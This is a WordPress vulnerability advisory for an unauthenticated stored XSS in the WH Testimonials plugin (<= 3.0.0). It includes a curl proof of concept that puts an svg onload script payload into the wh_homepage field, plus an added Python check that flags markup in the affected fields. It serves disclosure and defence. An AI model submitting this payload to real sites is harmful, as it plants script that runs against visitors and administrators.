WordPress Plugin Vulnerabilities
WH Testimonials <= 3.0.0 - Unauthenticated Stored XSS
Description
The plugin does not sanitise and escape the wh_homepage, wh_text_short and wh_text_full parameters of submitted testimonials, which could allow unauthenticated attackers to perform Stored Cross-Site Scripting attacks.
Proof of Concept
curl -X POST 'http://example.com/add/' \
  -H 'Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryLKXxMfAqKI63OgZ4' \
  -H 'Host: example.com' \
  -H 'Content-Length: XXX' \
  -d $'------WebKitFormBoundaryLKXxMfAqKI63OgZ4\r\nContent-Disposition: form-data; name="wh_clientname"\r\n\r\nFirst Name\r\n------WebKitFormBoundaryLKXxMfAqKI63OgZ4\r\nContent-Disposition: form-data; name="wh_company"\r\n\r\nLast Name\r\n------WebKitFormBoundaryLKXxMfAqKI63OgZ4\r\nContent-Disposition: form-data; name="wh_homepage"\r\n\r\n\"><svg/onload=prompt(/XSS/)>\r\n------WebKitFormBoundaryLKXxMfAqKI63OgZ4\r\nContent-Disposition: form-data; name="wh_text_short"\r\n\r\nShort Review\r\n------WebKitFormBoundaryLKXxMfAqKI63OgZ4\r\nContent-Disposition: form-data; name="wh_text_full"\r\n\r\nLong Review\r\n------WebKitFormBoundaryLKXxMfAqKI63OgZ4\r\nContent-Disposition: form-data; name="wh_sfimgurl"; filename=""\r\nContent-Type: application/octet-stream\r\n\r\n\r\n------WebKitFormBoundaryLKXxMfAqKI63OgZ4\r\nContent-Disposition: form-data; name="Wh_addnew"\r\n\r\nAdd Testimonial\r\n------WebKitFormBoundaryLKXxMfAqKI63OgZ4--\r\n'
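A defensive check for the kind of submission shown above, as an added example that is not part of the advisory or the plugin's code: it parses a multipart/form-data testimonial body and flags the three affected fields when they carry tag-like markup or, for wh_homepage, anything other than a plain http(s) URL. The function names, regular expressions and sample submission are assumptions constructed for illustration.

```python
import re
from email import message_from_bytes
from urllib.parse import urlsplit

# The three parameters the advisory lists as neither sanitised nor escaped.
WATCHED = ("wh_homepage", "wh_text_short", "wh_text_full")
TAG_LIKE = re.compile(r"<\s*[A-Za-z/!]")   # start of an HTML tag, end tag or comment
URL_UNSAFE = re.compile(r"[\s\"'<>`]")     # characters that can break out of an attribute

def parse_multipart(content_type: str, body: bytes) -> dict:
    """Decode a multipart/form-data body into {field name: text value}."""
    msg = message_from_bytes(b"Content-Type: " + content_type.encode() + b"\r\n\r\n" + body)
    fields = {}
    for part in (msg.get_payload() if msg.is_multipart() else []):
        name = part.get_param("name", header="content-disposition")
        if name:
            fields[name] = part.get_payload(decode=True).decode("utf-8", "replace").strip()
    return fields

def is_http_url(value: str) -> bool:
    try:
        parts = urlsplit(value)
    except ValueError:
        return False
    return (parts.scheme in ("http", "https") and bool(parts.netloc)
            and not URL_UNSAFE.search(value))

def review_submission(content_type: str, body: bytes) -> dict:
    """Return {field: [reasons]} for watched fields that should not be stored as-is."""
    findings = {}
    for name, value in parse_multipart(content_type, body).items():
        if name not in WATCHED:
            continue
        reasons = ["tag-like markup"] if TAG_LIKE.search(value) else []
        if name == "wh_homepage" and value and not is_http_url(value):
            reasons.append("not a plain http(s) URL")
        if reasons:
            findings[name] = reasons
    return findings

# Constructed sample submission with harmless markup, not taken from real traffic.
BOUNDARY = "----constructedBoundary0001"
SAMPLE_TYPE = "multipart/form-data; boundary=" + BOUNDARY
def build_body(fields: dict) -> bytes:
    parts = [f'--{BOUNDARY}\r\nContent-Disposition: form-data; name="{k}"\r\n\r\n{v}\r\n'
             for k, v in fields.items()]
    return ("".join(parts) + f"--{BOUNDARY}--\r\n").encode()
SAMPLE = build_body({"wh_clientname": "Test", "wh_homepage": "example.com/<i>",
                     "wh_text_short": "Great <b>service</b>", "wh_text_full": "Plain text"})
```

Flagging on input is a detection aid only; the root cause in the description is addressed by sanitising these fields on save and escaping them on output.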
Affects Plugins
References
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Daniel Kelley
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2023-03-11
Added
2023-03-13
Last Updated
2023-03-13